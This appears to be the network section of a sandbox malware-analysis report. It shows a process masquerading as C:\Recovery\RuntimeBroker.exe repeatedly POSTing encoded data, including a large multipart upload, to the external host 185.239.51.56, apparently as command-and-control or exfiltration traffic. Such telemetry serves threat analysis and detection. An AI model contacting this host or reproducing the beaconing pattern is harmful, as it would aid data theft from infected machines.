                                                                                                  Jan 1, 2025 02:28:51.853039980 CET5014180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:51.857949018 CET8050141185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:51.857963085 CET8050141185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:51.857971907 CET8050141185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:51.902582884 CET5014280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:51.906589985 CET5014180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:51.907442093 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:51.907510996 CET5014280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:51.910878897 CET5014280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:51.915705919 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:51.955291033 CET8050141185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:51.995043993 CET8050141185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:51.998121023 CET5014180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.153641939 CET5014380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.158494949 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.158644915 CET5014380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.158937931 CET5014380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.163716078 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.276593924 CET5014280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.281440973 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.281481981 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.503444910 CET5014380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.508443117 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.508454084 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.508461952 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.613178968 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.621011972 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.621081114 CET5014280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.621134043 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.621175051 CET5014280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.622096062 CET5014280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.626876116 CET8050142185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.870223999 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.877733946 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.877798080 CET5014380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.877806902 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:52.877924919 CET5014380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.878000021 CET5014380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:52.882683039 CET8050143185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.002099991 CET5014480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.007261038 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.007339001 CET5014480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.007575989 CET5014480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.012347937 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.362790108 CET5014480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.367706060 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.367717028 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.367724895 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.722229004 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.730906963 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.730953932 CET5014480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.730954885 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.730994940 CET5014480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.731084108 CET5014480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.735888004 CET8050144185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.845479965 CET5014580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.850334883 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:53.850394964 CET5014580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.850507021 CET5014580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:53.855298042 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.206568956 CET5014580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:54.211483002 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.211499929 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.211508989 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.555763006 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.563678026 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.563725948 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.566210985 CET5014580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:54.566436052 CET5014580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:54.571239948 CET8050145185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.729178905 CET5014680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:54.734137058 CET8050146185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:54.738233089 CET5014680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:54.741513014 CET5014680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:54.746376991 CET8050146185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:55.099294901 CET5014680192.168.2.4185.239.51.56
                                                                                                  • 185.239.51.56
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:12.663875103 CET | 294 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:13.384083986 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:13.498472929 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 01:27:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1384
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Jan 1, 2025 02:27:13.531605959 CET | 270 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 384
Expect: 100-continue
Jan 1, 2025 02:27:13.795865059 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:14.029853106 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:13.723997116 CET | 271 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Jan 1, 2025 02:27:14.432113886 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:14.443099976 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:14.068859100 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:14.842042923 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:14.848452091 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49738 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:14.634640932 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:15.336150885 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:15.346797943 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:14.859915972 CET | 341 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----4k4tMK3G3KPi7KkCKThjRxh2CLpKVewxph
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 112350
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:15.560447931 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:15.959947109 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:15 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49743 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:15.472629070 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:15.831309080 CET2504OUTData Raw: 56 5d 5e 5f 5a 59 5b 52 5f 5a 5a 53 57 5f 56 54 5f 59 5d 42 51 5c 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^_ZY[R_ZZSW_VT_Y]BQ\W_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+5Z%8\;!?9<"5&#70;711--"^%#[.>
Jan 1, 2025 02:27:16.171907902 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:16.187468052 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:16 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:16.382376909 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:16.737540960 CET2500OUTData Raw: 53 5e 5b 55 5f 5b 5e 57 5f 5a 5a 53 57 59 56 5f 5f 58 5d 45 51 57 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[U_[^W_ZZSWYV__X]EQWW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(/*_"2 4\--Z='-+81^#%= ($ %$>Y9"^%#[.
Jan 1, 2025 02:27:17.101691008 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:17.238337994 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:16 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:17.368746996 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:17.722012997 CET2504OUTData Raw: 56 5c 5e 5f 5f 5c 5e 54 5f 5a 5a 53 57 51 56 5f 5f 55 5d 45 51 52 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\^__\^T_ZZSWQV__U]EQRW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$</>_610\&38]8.-?.?8^!&5#+?3+&4=--"^%#[.
Jan 1, 2025 02:27:18.079006910 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:18.087153912 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:17 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:18.207506895 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:18.566746950 CET2504OUTData Raw: 56 5e 5b 50 5a 5b 5e 57 5f 5a 5a 53 57 5d 56 5e 5f 5f 5d 48 51 5c 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^[PZ[^W_ZZSW]V^__]HQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(2[5?'33/-1?'.?(:#%[4^?Q3]8^$$"\9"^%#[.6
Jan 1, 2025 02:27:18.908637047 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:19.045605898 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:18 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:19.258296967 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:19.612560034 CET2504OUTData Raw: 56 59 5b 52 5f 58 5e 53 5f 5a 5a 53 57 5d 56 54 5f 5e 5d 41 51 56 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY[R_X^S_ZZSW]VT_^]AQVWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$),=5& [/=(%+(&!55#/W%;14!:"^%#[.6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49751 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:19.868280888 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:20.221915960 CET1600OUTData Raw: 56 5a 5e 53 5a 58 5e 50 5f 5a 5a 53 57 5a 56 54 5f 58 5d 42 51 5d 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^SZX^P_ZZSWZVT_X]BQ]W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C+)#";1+8-2<%(8"&* ^4$(^%7*,="^%#[.*
Jan 1, 2025 02:27:20.591074944 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:20.598375082 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:20 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49752 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:19.999528885 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:20.346947908 CET2500OUTData Raw: 53 5a 5e 55 5a 5f 5e 54 5f 5a 5a 53 57 59 56 57 5f 5d 5d 46 51 52 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SZ^UZ_^T_ZZSWYVW_]]FQRW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+,[!,]%?,-.?$2_?;9_6&*^ (?%8$1"\."^%#[."
Jan 1, 2025 02:27:20.734596968 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:20.744664907 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:20 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49753 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:20.864361048 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:21.221965075 CET2504OUTData Raw: 53 5a 5b 57 5f 5b 5e 51 5f 5a 5a 53 57 5c 56 55 5f 5b 5d 47 51 50 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SZ[W_[^Q_ZZSW\VU_[]GQPW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B(Z!"#10#;2+&Y+%"%%7+'+4^27.-"^%#[.2
Jan 1, 2025 02:27:21.585427999 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:21.594379902 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:21 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:21.728800058 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
